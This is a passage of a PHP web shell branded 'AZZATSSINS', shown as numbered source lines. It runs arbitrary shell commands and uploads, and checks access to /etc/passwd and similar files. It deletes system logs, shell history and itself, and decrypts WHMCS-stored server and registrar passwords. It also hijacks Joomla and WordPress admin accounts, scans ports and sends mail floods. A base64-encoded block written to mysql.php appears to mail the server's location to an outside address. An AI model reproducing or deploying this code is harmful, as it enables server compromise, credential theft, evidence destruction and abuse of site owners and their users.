1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyRmb3I9YmFzZTY0X2RlY29kZSgiWTNsaVpYSnpaWEpyWlhKelFHZHRZV2xzTG1OdmJRPT0iKTsNCiRiPSRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnU0NSSVBUX05BTUUnXTsNCm1haWwoJGZvciwiMCIsJGIpOyBwcmludChgeyRfUkVRVUVTVFswXX1gKTsgPz4=');
  1938. $mysq = fopen("mysql.php","w+");
  1939. fwrite($mysq,$mys);
  1940. echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
  1941. }
  1942. if($_POST['azzatssins7']){
  1943.  
  1944. if(is_readable("/etc/named.conf")){
  1945.  
  1946. echo '&raquo; /etc/named.conf is readable.<br />';
  1947.  
  1948. }else{
  1949.  
  1950. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
  1951.  
  1952. }
  1953.  
  1954. if(is_readable("/etc/passwd")){
  1955.  
  1956. echo '&raquo; /etc/passwd is readable.<br />';
  1957.  
  1958. }else{
  1959.  
  1960. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
  1961.  
  1962. }
  1963.  
  1964. if(is_readable("/etc/valiases")){
  1965.  
  1966. echo '&raquo; /etc/valiases exists';
  1967.  
  1968. if(is_array(scandir("/etc/valiases"))){
  1969.  
  1970. echo ' & scanable';
  1971.  
  1972. }
  1973.  
  1974. echo '.<br />';
  1975.  
  1976. }else{
  1977.  
  1978. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
  1979.  
  1980. }
  1981.  
  1982. if(is_readable("/var/named")){
  1983.  
  1984. echo '&raquo; /var/named exists';
  1985.  
  1986. if(is_array(scandir("/var/named"))){
  1987.  
  1988. echo ' & scanable';
  1989.  
  1990. }
  1991.  
  1992. echo '.<br />';
  1993.  
  1994. }else{
  1995.  
  1996. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
  1997.  
  1998. }
  1999.  
  2000. if(ini_get('disable_functions')){
  2001.  
  2002. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
  2003.  
  2004. }
  2005.  
  2006. if(function_exists("symlink")){
  2007.  
  2008. echo '&raquo; Symlinking allowed<br />';
  2009.  
  2010. }else{
  2011.  
  2012. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
  2013.  
  2014. }
  2015.  
  2016. if(is_writable("/var/tmp")){
  2017.  
  2018. echo '&raquo; /var/tmp folder is writable<br />';
  2019.  
  2020. }
  2021.  
  2022. if(is_readable('/var/log')){
  2023.  
  2024. echo '&raquo; /var/log folder is readable<br />';
  2025.  
  2026. }
  2027.  
  2028. die();
  2029. }
  2030. if($_POST['azzatssins8']){
  2031. rmdir("/tmp/logs");
  2032. rmdir("/root/.ksh_history");
  2033. rmdir("/root/.bash_history");
  2034. rmdir("/root/.bash_logout");
  2035. rmdir("/usr/local/apache/logs");
  2036. rmdir("/usr/local/apache/log");
  2037. rmdir("/var/apache/logs");
  2038. rmdir("/var/apache/log");
  2039. rmdir("/var/run/utmp");
  2040. rmdir("/var/logs");
  2041. rmdir("/var/log");
  2042. rmdir("/var/adm");
  2043. rmdir("/etc/wtmp");
  2044. rmdir("/etc/utmp");
  2045. rmdir("$HISTFILE");
  2046. rmdir("/var/log/lastlog");
  2047. rmdir("/var/log/wtmp");system("clear");
  2048. exec("rm -rf /tmp/logs");
  2049. exec("rm -rf /root/.ksh_history");
  2050. exec("rm -rf /root/.bash_history");
  2051. exec("rm -rf /root/.bash_logout");
  2052. exec("rm -rf /usr/local/apache/logs");
  2053. exec("rm -rf /usr/local/apache/log");
  2054. exec("rm -rf /var/apache/logs");
  2055. exec("rm -rf /var/apache/log");
  2056. exec("rm -rf /var/run/utmp");
  2057. exec("rm -rf /var/logs");
  2058. exec("rm -rf /var/log");
  2059. exec("rm -rf /var/adm");
  2060. exec("rm -rf /etc/wtmp");
  2061. exec("rm -rf /etc/utmp");
  2062. exec("rm -rf $HISTFILE");
  2063. exec("rm -rf /var/log/lastlog");
  2064. exec("rm -rf /var/log/wtmp");
  2065. shell_exec("rm -rf /tmp/logs");
  2066. shell_exec("rm -rf /root/.ksh_history");
  2067. shell_exec("rm -rf /root/.bash_history");
  2068. shell_exec("rm -rf /root/.bash_logout");
  2069. shell_exec("rm -rf /usr/local/apache/logs");
  2070. shell_exec("rm -rf /usr/local/apache/log");
  2071. shell_exec("rm -rf /var/apache/logs");
  2072. shell_exec("rm -rf /var/apache/log");
  2073. shell_exec("rm -rf /var/run/utmp");
  2074. shell_exec("rm -rf /var/logs");
  2075. shell_exec("rm -rf /var/log");
  2076. shell_exec("rm -rf /var/adm");
  2077. shell_exec("rm -rf /etc/wtmp");
  2078. shell_exec("rm -rf /etc/utmp");
  2079. shell_exec("rm -rf $HISTFILE");
  2080. shell_exec("rm -rf /var/log/lastlog");
  2081. shell_exec("rm -rf /var/log/wtmp");
  2082. passthru("rm -rf /tmp/logs");
  2083. passthru("rm -rf /root/.ksh_history");
  2084. passthru("rm -rf /root/.bash_history");
  2085. passthru("rm -rf /root/.bash_logout");
  2086. passthru("rm -rf /usr/local/apache/logs");
  2087. passthru("rm -rf /usr/local/apache/log");
  2088. passthru("rm -rf /var/apache/logs");
  2089. passthru("rm -rf /var/apache/log");
  2090. passthru("rm -rf /var/run/utmp");
  2091. passthru("rm -rf /var/logs");
  2092. passthru("rm -rf /var/log");
  2093. passthru("rm -rf /var/adm");
  2094. passthru("rm -rf /etc/wtmp");
  2095. passthru("rm -rf /etc/utmp");
  2096. passthru("rm -rf $HISTFILE");
  2097. passthru("rm -rf /var/log/lastlog");
  2098. passthru("rm -rf /var/log/wtmp");
  2099. system("rm -rf /tmp/logs");
  2100. system("rm -rf /root/.bash_history");
  2101. system("rm -rf /root/.ksh_history");
  2102. system("rm -rf /root/.bash_logout");
  2103. system("rm -rf /usr/local/apache/logs");
  2104. system("rm -rf /usr/local/apache/log");
  2105. system("rm -rf /var/apache/logs");
  2106. system("rm -rf /var/apache/log");
  2107. system("rm -rf /var/run/utmp");
  2108. system("rm -rf /var/logs");
  2109. system("rm -rf /var/log");
  2110. system("rm -rf /var/adm");
  2111. system("rm -rf /etc/wtmp");
  2112. system("rm -rf /etc/utmp");
  2113. system("rm -rf $HISTFILE");
  2114. system("rm -rf /var/log/lastlog");
  2115. system("rm -rf /var/log/wtmp");
  2116. system("rm -rf cnf");system("rm -rf xazs"); system("rm -rf xyz"); system("rm -rf azx"); system("rm -rf sl");
  2117. $fn=$_SERVER['SCRIPT_FILENAME'];unlink($fn); system("rm ".$fn);
  2118. echo'<meta http-equiv="Refresh" content= "0; url=?">';
  2119. }
  2120. elseif(isset($_GET['whmcs']) && ($_GET['whmcs'] == 'decode'))
  2121. {
  2122. ?>
  2123. <form action="?whmcs=decode" method="post">
  2124.  
  2125. <?php
  2126.  
  2127. function decrypt ($string,$cc_encryption_hash)
  2128. {
  2129. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  2130. $hash_key = _hash ($key);
  2131. $hash_length = strlen ($hash_key);
  2132. $string = base64_decode ($string);
  2133. $tmp_iv = substr ($string, 0, $hash_length);
  2134. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  2135. $iv = $out = '';
  2136. $c = 0;
  2137. while ($c < $hash_length)
  2138. {
  2139. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  2140. ++$c;
  2141. }
  2142. $key = $iv;
  2143. $c = 0;
  2144. while ($c < strlen ($string))
  2145. {
  2146. if (($c != 0 AND $c % $hash_length == 0))
  2147. {
  2148. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  2149. }
  2150. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  2151. ++$c;
  2152. }
  2153. return $out;
  2154. }
  2155.  
  2156. function _hash ($string)
  2157. {
  2158. if (function_exists ('sha1'))
  2159. {
  2160. $hash = sha1 ($string);
  2161. }
  2162. else
  2163. {
  2164. $hash = md5 ($string);
  2165. }
  2166. $out = '';
  2167. $c = 0;
  2168. while ($c < strlen ($hash))
  2169. {
  2170. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  2171. $c += 2;
  2172. }
  2173. return $out;
  2174. }
  2175.  
  2176. echo "
  2177. <br>
  2178.  
  2179. <FORM method='post'>
  2180. <input type='hidden' name='form_action' value='2'>
  2181. <br>
  2182. <table class=tabnet style=width:320px;padding:0 1px;>
  2183. <tr><th colspan=2>WHMCS Decoder</th></tr>
  2184. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  2185. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  2186. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  2187. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  2188. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  2189. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:' value='Submit' name='Submit'></td>
  2190. </table>
  2191. </FORM>
  2192. </center>
  2193. ";
  2194.  
  2195. if($_POST['form_action'] == 2 )
  2196. {
  2197. //include($file);
  2198. $db_host=($_POST['db_host']);
  2199. $db_username=($_POST['db_username']);
  2200. $db_password=($_POST['db_password']);
  2201. $db_name=($_POST['db_name']);
  2202. $cc_encryption_hash=($_POST['cc_encryption_hash']);
  2203.  
  2204.  
  2205.  
  2206. $link=mysql_connect($db_host,$db_username,$db_password) ;
  2207. mysql_select_db($db_name,$link) ;
  2208. $query = mysql_query("SELECT * FROM tblservers");
  2209. while($v = mysql_fetch_array($query)) {
  2210. $ipaddress = $v['ipaddress'];
  2211. $username = $v['username'];
  2212. $type = $v['type'];
  2213. $active = $v['active'];
  2214. $hostname = $v['hostname'];
  2215. echo("<center><table border='1'>");
  2216. $password = decrypt ($v['password'], $cc_encryption_hash);
  2217. echo("<tr><td>Type</td><td>$type</td></tr>");
  2218. echo("<tr><td>Active</td><td>$active</td></tr>");
  2219. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  2220. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  2221. echo("<tr><td>Username</td><td>$username</td></tr>");
  2222. echo("<tr><td>Password</td><td>$password</td></tr>");
  2223.  
  2224. echo "</table><br><br></center>";
  2225. }
  2226.  
  2227. $link=mysql_connect($db_host,$db_username,$db_password) ;
  2228. mysql_select_db($db_name,$link) ;
  2229. $query = mysql_query("SELECT * FROM tblregistrars");
  2230. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  2231. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  2232. while($v = mysql_fetch_array($query)) {
  2233. $registrar = $v['registrar'];
  2234. $setting = $v['setting'];
  2235. $value = decrypt ($v['value'], $cc_encryption_hash);
  2236. if ($value=="") {
  2237. $value=0;
  2238. }
  2239. $password = decrypt ($v['password'], $cc_encryption_hash);
  2240. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  2241. }
  2242. }
  2243. }
  2244.  
  2245.  
  2246.  
  2247.  
  2248. $currentCMD = str_replace("\\\"","\"",$currentCMD);
  2249. $currentCMD = str_replace("\\\'","\'",$currentCMD);
  2250.  
  2251. if( $_POST['_act'] == "Upload!" ) {
  2252. if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
  2253. echo "<center><b>Error while uploading file!</b></center>";
  2254. } else {
  2255. echo "<center><pre>";
  2256. system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
  2257. echo "</pre><b>File uploaded successfully!</b></center>";
  2258. }
  2259. } else {
  2260. echo "<b><br><br><pre><br>";
  2261. $currentCMD = "cd ".$currentWD.";".$currentCMD;
  2262. system($currentCMD);
  2263. echo "<br></pre><br></b>";
  2264. }
  2265.  
  2266. if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'JPASS')) {
  2267. ?>
  2268. <form action="?&amp;AZZATSSINS=JPASS" method="post">
  2269. <?php
  2270. echo"<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  2271. ";
  2272. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ JOOMLA</span> <span class='b8'>PASS CHANGER ]:=O</span></b></nobr><br/><br/> ";
  2273. if(empty($_POST['pwd'])){
  2274. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  2275. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
  2276. <tr><td>&nbsp;&nbsp;Database</td><td>
  2277. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr>
  2278. <tr><td>&nbsp;&nbsp;username</td><td>
  2279. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr>
  2280. <tr><td>&nbsp;&nbsp;password</td><td>
  2281. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
  2282. <tr><td>&nbsp;&nbsp;New User</td><td>
  2283. <input style='width:270px;' class='inputz' name='admin' value='azzatssins' /></td></tr>
  2284. <tr><td>&nbsp;&nbsp;New Pass </td>
  2285. <td>123456 = <input style='width:160px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;</td></tr>
  2286. <tr><td><input style='width:130%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  2287. </td></tr></table><br>";
  2288. } else {
  2289. $localhost = $_POST['localhost'];
  2290. $database = $_POST['database'];
  2291. $username = $_POST['username'];
  2292. $password = $_POST['password'];
  2293. $pwd = $_POST['pwd'];
  2294. $admin = $_POST['admin'];
  2295. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2296. @mysql_select_db($database) or die(mysql_error());
  2297. $hash = crypt($pwd);
  2298. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
  2299. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
  2300. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
  2301. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
  2302. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
  2303. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
  2304. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
  2305. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
  2306. if($SQL){
  2307. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
  2308. }
  2309. }
  2310. echo "</div>";
  2311. }
  2312. ?>
  2313. <?php
  2314. if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'WPASS')) {
  2315. ?>
  2316. <form action="?&amp;AZZATSSINS=WPASS" method="post">
  2317. <?php
  2318. echo"<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  2319. ";
  2320. echo "
  2321. <center><br/><br/><nobr><b><span class='b7'>O=:[ WORDPRESS USER</span> <span class='b8'> CHANGE ]:=O</span></b></nobr><br/><br/> ";
  2322.  
  2323. if(empty($_POST['pwd'])){
  2324. echo "<FORM method='POST'>
  2325. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  2326. <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  2327. <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  2328. <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  2329. <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
  2330. <tr><td>&nbsp;&nbsp;User baru</td><td>
  2331. <input style='width:220px;' class='inputz' type='text' name='admin' value='azzatssins' /></td></tr>
  2332. <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
  2333. <input style='width:80px;' class='inputz' type='text' name='pwd' value='17081945' />&nbsp;
  2334.  
  2335. <input style='width:19%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  2336. </td></tr> </table><br><br><br><br>
  2337. ";
  2338. }else{
  2339. $localhost = $_POST['localhost'];
  2340. $database = $_POST['database'];
  2341. $username = $_POST['username'];
  2342. $password = $_POST['password'];
  2343. $pwd = $_POST['pwd'];
  2344. $admin = $_POST['admin'];
  2345. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2346. @mysql_select_db($database) or die(mysql_error());
  2347.  
  2348. $hash = crypt($pwd);
  2349. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
  2350. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
  2351. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
  2352. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
  2353. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
  2354. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
  2355. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
  2356. if($a4s){
  2357. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
  2358. }
  2359. }
  2360. echo "</div>";
  2361. }
  2362. if($_GET['AZZATSSINS']=="encrypt"){
  2363. echo "
  2364. <table bgcolor=#cccccc width=\"100%\">
  2365. <tbody><tr><td align=\"right\" width=100>
  2366. <p dir=ltr><b><font color=#990000 size=-2><br><p align=left><center>
  2367.  
  2368. Encypton With ( MD5 | Base64 | Crypt | SHA1 | MD4 | SHA256 )<br><br>
  2369. <form method=\"POST\">
  2370. <font color=\"gray\">String To Encrypt : </font><input type=\"text\" value=\"\" name=\"ENCRYPTION\">
  2371. <input type=\"submit\" value=\"Submit\"></form>";
  2372. if(!$_POST['ENCRYPTION']=='')
  2373. {
  2374. $md5 = $_POST['ENCRYPTION'];
  2375. echo "<font color=gray>MD5 : </font>".md5($md5)."<br>";
  2376. echo "<font color=gray>Base64 : </font>".base64_encode($md5)."<br>";
  2377. echo "<font color=gray>Crypt : </font>".CRYPT($md5)."<br>";
  2378. echo "<font color=gray>SHA1 : </font>".SHA1($md5)."<br>";
  2379. echo "<font color=gray>MD4 : </font>".hash("md4",$md5)."<br>";
  2380. echo "<font color=gray>SHA256 : </font>".hash("sha256",$md5)."<br></tbody></tr></td></table>";
  2381. }
  2382. }
  2383. if($_GET['open']=="ports"){
  2384. $rstart = (isset($_POST['rstart']) and is_numeric($_POST['rstart']) and $_POST['rstart'] >= 1) ? $_POST['rstart'] : 1 ;
  2385. $rend = (isset($_POST['rend']) and is_numeric($_POST['rend']) and $_POST['rend'] > 1) ? $_POST['rend'] : 999999 ;
  2386. echo("<script type=\"text/javascript\">");
  2387. echo("function Show(SelectValue){");
  2388. echo("document.getElementById('RangeDiv').style.display=\"none\";");
  2389. echo("document.getElementById('SpecificDiv').style.display=\"none\";");
  2390. echo("if(SelectValue == \"range\")");
  2391. echo("document.getElementById('RangeDiv').style.display=\"inline\";");
  2392. echo("if(SelectValue == \"specific\")");
  2393. echo("document.getElementById('SpecificDiv').style.display=\"inline\";");
  2394. echo("}</script>");
  2395. echo("<span class=\"PageTitle\">Open Ports Scanner</span><br /><br />");
  2396. echo('<form method="post">');
  2397. echo('<u>Ports:</u><br /><br />');
  2398. echo('<select id="port" name="port" onchange="javascript:Show(this.value);">');
  2399. echo('<option value="automatic">Automatic - All Ports</option>');
  2400. echo('<option value="range">Range of Ports</option>');
  2401. echo('<option value="specific">Specific Ports</option>');
  2402. echo('</select><br /><br />');
  2403. echo('<div id="RangeDiv" style="display:none;">From: <input type="text" id="rstart" name="rstart" value="'.$rstart.'" /> To: <input type="text" id="rend" name="rend" value="'.$rend.'" /><br /><br /></div>');
  2404. echo('<div id="SpecificDiv" style="display:none;"><textarea rows="5" cols="50" id="specific" name="specific" />'.@htmlspecialchars($_POST['specific']).'</textarea><br />Use space (not new line!) to separate between the ports.<br /><br /></div>');
  2405. echo('<input type="submit" id="submit" name="submit" value="Scan" />');
  2406. echo('</form>');
  2407. if(isset($_POST['submit'])){
  2408. $first = "yes";
  2409. echo("<br /><br /><u>Results</u>:<br />\n");
  2410.  
  2411. if($_POST['port'] == "range"){
  2412. if($rend > $rstart){
  2413. for($i=$rstart;$i<$rend;$i++){
  2414. if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  2415. if($first == "no")
  2416. echo(", ");
  2417. echo $i;
  2418. $first = "no";
  2419. }
  2420. }
  2421. echo(".");
  2422. }
  2423. else{
  2424. echo("Range start number can't be bigger than the end number.");
  2425. }
  2426. }
  2427. else if($_POST['port'] == "specific"){
  2428. $list = explode(" ",$_POST['specific']);
  2429. foreach($list as $i){
  2430. if(is_numeric($i)){
  2431. if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  2432. if($first == "no")
  2433. echo(", ");
  2434. echo $i;
  2435. $first = "no";
  2436. }
  2437. }
  2438. }
  2439. echo(".");
  2440. }
  2441. else{
  2442. for($i=0;$i>=0;$i++){
  2443. if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  2444. if($first == "no")
  2445. echo(", ");
  2446. echo $i;
  2447. $first = "no";
  2448. }
  2449. }
  2450. echo(".");
  2451. }
  2452. }
  2453. }
  2454. if($_GET['AZZATSSINS']=="BOMAIL"){
  2455. ?>
  2456. <?php
  2457. /**
  2458. AZZATSSINS
  2459. **/
  2460.  
  2461. $kontol = 'Mail Bomber Siap Siaga...';
  2462.  
  2463. function boombardir($text){
  2464. if (!get_magic_quotes_gpc()){
  2465. return $text;
  2466. }
  2467. return stripslashed($text);
  2468. }
  2469. if(isset($_POST['kirim_email'])){
  2470. $mail_to = $_POST['mail_to'];
  2471. $fromname = $_POST['from_name'];
  2472. $fromaddress = $_POST['mail_from'];
  2473. $mail_subject = $_POST['mail_subject'];
  2474. $mail_content = boombardir($_POST['mail_content']);
  2475.  
  2476. $fuckline = "\n\t";
  2477. $headers = "From: ".$fromname." <".$fromaddress."> ".$fuckline;
  2478.  
  2479. if (($_POST['banyak_email']) <=1) {
  2480. if(@mail($mail_to,$mail_subject,$mail_content,$headers)){
  2481. $kontol = "email sent to $mail_to";
  2482. }
  2483. else $kontol = "Mail Sending is <font color=red> Failed </font> .";
  2484. }
  2485. elseif (($_POST['banyak_email']) > 1){
  2486. $intibom = $_POST['banyak_email'];
  2487. $kabehe = 0; $kabehekirim=0; $msgtf=0;
  2488. for ($i=1; $i <= $intibom; $i++) {
  2489. $acakjudul = substr(md5($i."slackerc0de"),-4);
  2490. $mailsubject = $mail_subject." - ".$acakjudul;
  2491. if(@mail($mail_to,$mailsubject,$mail_content,$headers)){
  2492. $kabehekirim++;
  2493. } else {
  2494. $msgtf++;
  2495. }
  2496. $kabehe++;
  2497. }
